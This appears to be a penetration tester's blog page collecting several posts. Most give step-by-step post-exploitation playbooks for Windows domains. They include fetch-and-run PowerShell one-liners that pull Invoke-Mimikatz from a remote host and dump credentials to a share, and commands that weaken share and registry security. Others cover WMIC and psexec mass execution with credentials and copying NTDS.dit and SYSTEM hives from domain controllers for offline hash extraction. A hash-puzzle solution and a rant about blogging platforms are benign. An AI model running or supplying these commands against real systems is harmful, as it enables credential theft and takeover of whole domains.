Outlook Cached Attachments

I happened upon an interesting directory today that I didn’t know about:

%USERPROFILE%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\

In that directory was what looked to be a randomly generated 8 character directory (i.e A821ZSQI) inside of which held a bunch of attachments from my email (not just my inbox).

According to Microsoft KB 817878 this is a “Secure” temp folder which can be identified by a handy dandy registry key (Outlook 2010 referenced, KB has others):

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Outlook\Security

I tested this out with a email that was encrypted. Once the file was opened it landed in the temp directory and stayed there after I closed the email and Outlook.

This is definitely going on the top of my Post-Exploitation click scripts.

Read More

Dumping a Domain Worth of Passwords With Mimikatz

clymb3r recently posted a script called “Invoke-Mimikatz.ps1” basically what this does is reflectively injects mimikatz into memory, calls for all the logonPasswords and exits. It even checks the targets architecture (x86/x64) first and injects the correct DLL.

You can very easily use this script directly from an admin command prompt as so:

powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"

(This works REALLY well for Citrix and Kiosk scenarios and it’s too hard to type/remember) This runs the powershell script by directly pulling it from Github and executing it “in memory” on your system.

One of the awesome added capabilities for this script is to run on a list of hosts. as so:

powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds -ComputerName @('computer1', 'computer2')"

This works great as all the output is directly on your system and all executed through Powershell Remoting. Powershell Remoting is pretty much the same as WinRM. This service however is not enabled by default and can be pretty hit or miss on how much any given enterprise uses WinRM. However, it is usually the servers and more important systems that have it enabled more often than not.

You can find WinRM / PowerShell Remoting by scanning for the service port 47001 as well as the default comm ports for WinRM 5985 (HTTP) and 5986 (HTTPS).

If you find that your target isn’t a WinRM rich environment or you just want more passwords you can take a slightly more painful route, I call it “Mass Mimikatz”

Step 1. 

Make a share, we are doing this so we can not only collect the output of all our computers passwords, but to host the CMD batch file that will run the powershell script:

cd\
mkdir open
net share open=C:\open /grant:everyone,full
icacls C:\open\ /grant Everyone:(OI)(CI)F /t

We are setting “Everyone” permissions on a Share (net share) and NTFS (icacls) level for this to work properly.

Step 2.

Set registry keys. There are two registry keys that we need to set. The first allows Null Sessions to our new share and the second allows null users to have the “Everyone” token so that we don’t have to get crazy with our permissions. I have create a meterpreter script that has a bunch of error checking here: massmimi_reg.rb or you can just make the following changes”

HKLM\System\CurrentControlSet\services\LanmanServer\Parameters NullSessionShares REG_MULTI_SZ  = open
HKLM\System\CurrentControlSet\Contol\Lsa "EveryoneIncludesAnonymous" = 1

Step 3.

Change directory into new “open” directory. This is so our uploads and in particular our web server will be hosted out of the correct directory.

Step 4.

Upload powershell script powermeup.cmd – this script will run our hosted Invoke-Mimikatz script on each host:

powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.127:8080/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds > \\192.168.1.127\open\%COMPUTERNAME%.txt 2>&1

Step 5.

Upload clymb3r’s Invoke-Mimikatz ps1 – Download from PowerSploit repo: source on github

Step 6.

Upload mongoose: Downloads Page – Both regular and tiny versions work. This is an awesome, single executable webserver that supports LUA, Sqlite, and WebDAV out of the box. Tiny version is under 100k.

Step 7.

Upload serverlist.txt – This is a line by line list of computer names to use mimikatz on. You’ll have to gather this one way or another.

Step 8.

Execute mongoose (from directory with mimikatz.ps1) – This will start a listener with directory listings enabled on port 8080 by default

Step 9a.

Execute wmic:

wmic /node:@serverlist.txt process call create "\\192.168.92.127\open\powershellme.cmd"

Step 9b.

Execute wmic with creds:

wmic /node:@serverlist.txt /user:PROJECTMENTOR\jdoe /password:ASDqwe123 process call create "\\192.168.92.127\open\powershellme.cmd"

Step 10.

Watch as text files full of wonder and joy fill your share.

You can find the scripts here: https://github.com/mubix/post-exploitation/tree/master/scripts/mass_mimikatz

Don’t forget to clean up::

1. kill mongoose process
2. net share open /delete
3. kill/reset registry values
4. delete “open” directory

Got a better way of getting this done? Please leave a comment.

P.S. You could just enable Powershell Remoting for them ;)

psexec @serverlist.txt -u [admin account name] -p [admin account password] -h -d powershell.exe "enable-psremoting -force"

"Passwords, here, here, here, EVERYWHERE!"

Read More

Vanilla Cake #DerbyCake 2013 Solution

One of the most contested parts of the #DerbyCake contest was the hint on the Vanilla cake. It was just a long string of 1s and 0s. The hint that I kept telling everyone is that the “binary is binary” and I meant it. You weren’t supposed to hash or do anything special with it.

The reason this particular challenge is in the contest is that I run into this scenario a lot. Many times when I access binary password fields in either the Windows registry or in database servers the data comes out in 1s and 0s or some other binary format and I have to convert it back into its original hash format.

The solution there-for is pretty straight forward. You start with your very long binary string: (I’m using ruby, but its pretty much the same in Python or another language)

cakestring = '01111101011110101110111111100110101110010001000111010101010110010000100110100010011011110110010001111110101010101010111110100111000111101101001011010010001100011110101100100110101011011011001110100001010110100100101000100010100111110011100001000110100101101100101010110011011000100010001110111100011011100001011011100001111111000110101111110111101111011101110001000100010010001001001010001100101010100000000111000000100110001100011011100010010101001110000011100001100000010111111100100000011101100100011001110101'

Then you “pack” the binary into a string format:

reverse1 = [cakestring].pack("b*")

And finally into the hex format of the SHA512 hash (most people got that it was a 512 hash due to the 512 bits:

puts "Hash: #{reverse1.unpack("H*")}"

That easy. Resulting in a easily cracked SHA512 hash (that is, if you got all the hints in the DerbyCon presenters slides)

Hash: be5ef7679d88ab9a9045f6267e55f5e5784b4b8cd764b5cd855a5244f91c626953cd46c43d7668873fd6efbd3b221249315580031963472a078781fe046e62ae
Password: correct horse battery staple

Here is how you would generate such a challenge if you were so inclined:

#!/usr/bin/env ruby
require 'digest/sha2'

password = "correct horse battery staple"
puts "Password: #{password}"
forwards1 = Digest::SHA512.hexdigest(password)
puts "Hash: #{forwards1}"

forwards2 = forwards1.scan(/../)
forwards3 = []
forwards2.each do |f2|
    forwards3 << f2.hex.chr
end
forwards4 = forwards3.join

puts "Binary: #{forwards4.unpack("b*")}"

You can find a write up of the rest of the challenges and hints over on Ryan Fenno’s blog here: http://slae412.wordpress.com/2013/10/04/derbycake-2013-write-up/

Sorry to everyone who beat their head upside the wall for hours on this one. I was actually expecting this to be the first challenge to fall.

Read More

Mass Mimikatz

1. Make Share:

cd\

mkdir open

net share open=C:\open /grant:everyone,full

icacls C:\open\ /grant Everyone:(OI)(CI)F /t

2. Set registry keys (massmimi_reg.rb meterpreter script):

reg change HKLM\System\CurrentControlSet\services\LanmanServer\Parameters NullSessionShares REG_MULTI_SZ open

reg change HKLM\System\CurrentControlSet\Contol\Lsa "EveryoneIncludesAnonymous" 1

3. Change directory into new “open” directory

4. Upload powershell script (powermeup.cmd):

powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.127:8080/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds > \\192.168.1.127\open\%COMPUTERNAME%.txt 2>&1

5. Upload clymb3r’s Invoke-Mimikatz.ps1 - Download from PowerSploit repo: source on github

6. Upload mongoose: Downloads Page (Updated to use Archive.org version) - Both regular and tiny versions work

7. Upload serverlist.txt - This is a line by line list of computer names to use mimikatz on.

8. Execute mongoose (from directory with mimikatz.ps1) - This will start a listener with directory listings enabled on port 8080 by default

9. Execute wmic:

wmic /node:@serverlist.txt process call create "\\192.168.92.127\open\powershellme.cmd"

9a. Execute wmic with creds:

wmic /node:@serverlist.txt /user:PROJECTMENTOR\jdoe /password:ASDqwe123 process call create "\\192.168.92.127\open\powershellme.cmd"

clean up:
1. kill mongoose process
2. net share open /delete
3. kill registry values
4. delete “open” directory

Read More

Blogging Requirements

So I’ve been trying out blogging software and platforms up and down the Internet streets, and I really haven’t found one that works really well (IMHO).

Until @daanraman suggested Roon.io which I hadn’t heard of yet. I have to admit, it has probably one of the best designed interfaces I’ve seen. I don’t need micromanage control over a blog. I have pretty basic needs actually.

1. I have to be able to blog from where I want to blog. Oddly enough this is where most newer blogging platforms fall down. Your amazing Javascript editor that took your 500 hours to get right is just something I’m not going to use all that often. Its pretty rare for me to want to blog inside of a browser actually. I usually have 100 tabs open and your stupid editor is often lost in the mix. It’s just nice to have something separate that I can pull things I have in those 100 browser tabs into without having to find the editor tab again. (yes, I realize I can pull out another windows but then the editors usually don’t fit)
2. I post code snippets, directory listings and a ton of other things that I don’t want officially rendered. This is probably not a common problem among bloggers but I can’t count how many times and platforms can’t get a simple windows directory listing to display correctly without me trying to figure out what code finagling I have to do to get the blogging platform to display it the way I need it to. I will use whatever syntax is needed, I just can’t be expected to remember every undocumented workaround to get a HTML tag to display without rendering.
3. This a bit of #1 but I need to be able to blog with ease. If it takes me 40 minutes to just get formatting correct or fixing blogging software to blogging platform incompatibility issues, I’m just going to stop trying. Or if it takes me 10 minutes of git update, git push etc to add a new post, it just isn’t worth it. (I realize you can script Octopress up, but then you’ll have it scripted up in one location/computer, which goes against #1
4. I really don’t care how many templates or formats you have, as long as one is actually readable. I know most customers/bloggers want their Ads, and support, and logos and stuff everywhere. I’m not them. If the reader has an easy time reading my content, I’m happy.
5. I will pay for these conveniences. I’ve been paying SquareSpace for close to 4 years now about $20 per month. I actually don’t want my blogging service to be free. The reason for this is because free == I’m the product. I don’t want Ads to one day creep into my site because the developer of the blogging platform needs money to live on. I would rather pay them directly. The other thing that “free” breeds, is direction inflicted by the one paying the bills. I use the word “inflicted” quite specifically since I have seen some blogging platforms go down the tubes because their VC had some “brilliant” ideas. I’d pay fair pay for fair service.
6. A developer/team/support who listen. I don’t care if they say “sorry, not something we are looking on doing”, thats fair, its their software, not mine, and I’m a big boy I can move on if its something I care about. But honestly, I have no idea why most applications don’t have a ‘vote for a feature’ option/service, or at the very least “feature request” buttons.
7. Hosted. I’m very much done trying to protect and secure a platform or OS that my blog is hosted on. I’d rather spend my time on other things, like you know, generating content.

Anywho, thats my rant on what I’d love to see in a blogging platform, promised someone I would write it up, so here it is.

Read More

Volume Shadow Copy NTDS.dit Domain Hashes Remotely - Part 1

This and part 2 are mostly just an update to http://securityweekly.com/2011/11/02/safely-dumping-hashes-from-liv/ but without the need for VSSOwn, that and we are doing it remotely without the need for shell on the DC.

Ever run into a Domain Controller that wasn’t allowed to talk to the Internet, had insane AV and GPOs not allowing anyone to RDP in (Even Domain Admins) unless they provided some kind of voodo happy dance? Ya me neither, but here is how you can still dump domain hashes and hash history if you run into that case. Lets start

First authenticate to the domain controller and make sure you have a good working directory to use.

net use \\DC1 /user:DOMAIN\domainadminsvc domainadminsvc123
dir \\DC1\C$

Alright, lets say “TEMP” is there and it’s empty on the remote DC. The way we are going to run commands will not allow us to get results directly so we are going to use a temp file on the DC in C:\TEMP where we already made sure is clear.

We are going to be using Volume Shadow Copies to pull the NTDS.dit file (Active Directory’s DB much like Window’s SAM file except that it stores the entire AD set of objects there), we also need the SYSTEM registry hive. You can get the SAM registry hive as well but that will only get local DC credentials.

So lets list the current volume shadow copies to see if we need to create one, from a Windows command prompt (or if you’ve installed wmic for Linux via http://www.krenger.ch/blog/wmi-commands-from-linux/ ) – this IS an interactive command so this won’t work very nicely in a Meterpreter shell:

C:\temp>wmic /node:DC1 /user:DOMAIN\domainadminsvc /password:domainadminsvc123 process call create "cmd /c vssadmin list shadows 2>&1 > C:\tempoutput.txt"
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
        ProcessId = 7304;
        ReturnValue = 0;
};

To break down this command:

• wmic /node:DC1 – tells it to interact with the WMI API on DC1
• /user:DOMAIN\domainadminsvc /password:domainadminsvc123 – authentication
• process call create – WMI speak for create a process
• cmd /c – vssadmin doesn’t operate outside of cmd for some reason…
• vssadmin list shadows – List any shadow volumes that already exist
• 2>&1 > C:\temp\output.txt – Take STDIN and STDERROR and throw it in a text file on DC1 C:\TEMP. Make sure you specify full path because you will be executing from within C:\Windows\System32 and its a pain to find anything in that directory. So if you just specify > bob.txt you get to hunt in C:\Windows\System32 or wherever WMI wants to execute you from for bob.txt

Process starts and then you need to view the output file by either copying it down, type \DC1\C$\TEMP\output.txt or mount the C drive as a network share. Either way you should either see something like this:

C:\temp>type output.txt
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2005 Microsoft Corp.

Contents of shadow copy set ID: {671090fd-0198}
   Contained 1 shadow copies at creation time: 5/31/2013 11:29:03 AM
      Shadow Copy ID: {0863e309}
         Original Volume: (C:)\\?\Volume{c44da10e-0154-11e1-b968-806e6f6e6963}\
         Shadow Copy Volume: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
         Originating Machine: wpad
         Service Machine: wpad
         Provider: 'Microsoft Software Shadow Copy provider 1.0'
         Type: ClientAccessibleWriters
         Attributes: Persistent, Client-accessible, No auto release, Differential, Auto recovered

or

C:\temp>type output.txt
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2005 Microsoft Corp.

No items found that satisfy the query
If there are no shadow copies or the ones there are too old (look at the creation time), you can create a shadow copy using the ‘vssadmin create shadow /for=C: command. (This command only applies to Server OS (Win2k3/Win2k8) but since those are the only two that commonly have NTDS.dit files we don’t have to remember this):

C:\temp>wmic /node:DC1 /user:DOMAIN\domainadminsvc /password:domainadminsvc123 process call create "cmd /c vssadmin create shadow /for=C: 2>&1 > C:\temp\output.txt"

The other thing to keep in mind is that NTDS.dit isn’t always on the main drive. It is commonly on a “D” drive for safety if a HDD goes bad or something. But it should always be in a folder called NTDS. (By default this is C:WindowsNTDS)

Next we just copy the files out of the shadow copies. First the SYSTEM hive:

C:\temp>wmic /node:DC1 /user:DOMAIN\domainadminsvc /password:domainadminsvc123 process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\temp\SYSTEM.hive 2>&1 > C:\temp\output.txt"

Then the NTDS.dit (notice this one isn’t in System32):

C:\temp>wmic /node:DC1 /user:DOMAIN\domainadminsvc /password:domainadminsvc123 process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit C:\temp\NTDS.dit 2>&1 > C:\temp\output.txt"

In Kali Linux you could use the WMIS package to do much the same thing:

root@kali:~# wmis -U DOMAIN\domainadminsvc%domainadminsvc123 //DC1 cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit C:\temp\NTDS.dit 2>&1 > C:\temp\output.txt
NTSTATUS: NT_STATUS_OK - Success

Copy those files to your own system for offline extraction which I’ll cover in part 2.

Read More

Setting SYSTEM's Proxy Settings With Metasploit

One of the great things about the reverse_http(s) payloads is that it is proxy aware. However one of the pitfalls to this is that SYSTEM doesn’t have proxy settings, nor do users who have never logged into a system (unless profile loading is triggered). The problem here arrises when you are trying to do anything as SYSTEM, also the PSEXEC only has the option of getting you a SYSTEM shell (so you’re done for right out of the door)

Now, there is a stub in Metasploit that I have been unable to complete due to my lack of knowledge in the shell code world. The stub allows you to create payloads that have static proxies, which basically invalidates the need for the following. Until then here is a few ways to set / read the proxy settings for SYSTEM or any other user for that matter.

Its here if you want to take a whack at it:
external/source/shellcode/windows/x86/src/block/block_reverse_https_proxy.asm

One of the ways @carnal0wnage and I demoed @DerbyCon was using the bitsadmin binary. Windows7/Vista/2008 come with version 2.0+ which has this great ability to run the following:

bitsadmin /util /setieproxy localsystem MANUAL_PROXY 192.168.1.55:3128 ";"

(2000,XP,2003 you could upload a copy of bitsadmin that was new enough and that would still work)

That command sets the proxy settings for the SYSTEM account. I was able to jump through hoops and do this remotely by using the windows/exec payload via psexec, then reverse_http(s) would work.

But I wanted a better way to do this. I watched the execution of bitsadmin to see what it was doing and all it was actually doing is setting a registry key. Awesome, I can do that.

Enter enum_proxy:

And…

If you’ve noticed that RHOST option, Metasploit has the ability to do remote registry calls as well (this module will attempt to start the RemoteRegistry service if the user has the privilege to do so):

Output from it finding a disabled RemoteRegistry:

msf post(enum_proxy) > run

[-] Unable to contact remote registry service on 172.16.10.217
[*] Attempting to start service remotely...
[*] Proxy Counter = 9
[*] Setting: WPAD and AutoConfigure script
[*] AutoConfigURL: http://anotherproxyserver/pac.pac
[*] Post module execution completed

“Awesome but you promised setting the proxy settings”, well right now all I can give you is a cloner ;–)

Enter clone_proxy_settings module:

And that's it. Still working on an actual “set_proxy” module, but this should do for now, and a lot less to type.

As of this post both are currently pull requests:

• https://github.com/rapid7/metasploit-framework/pull/942
• https://github.com/rapid7/metasploit-framework/pull/943

Read More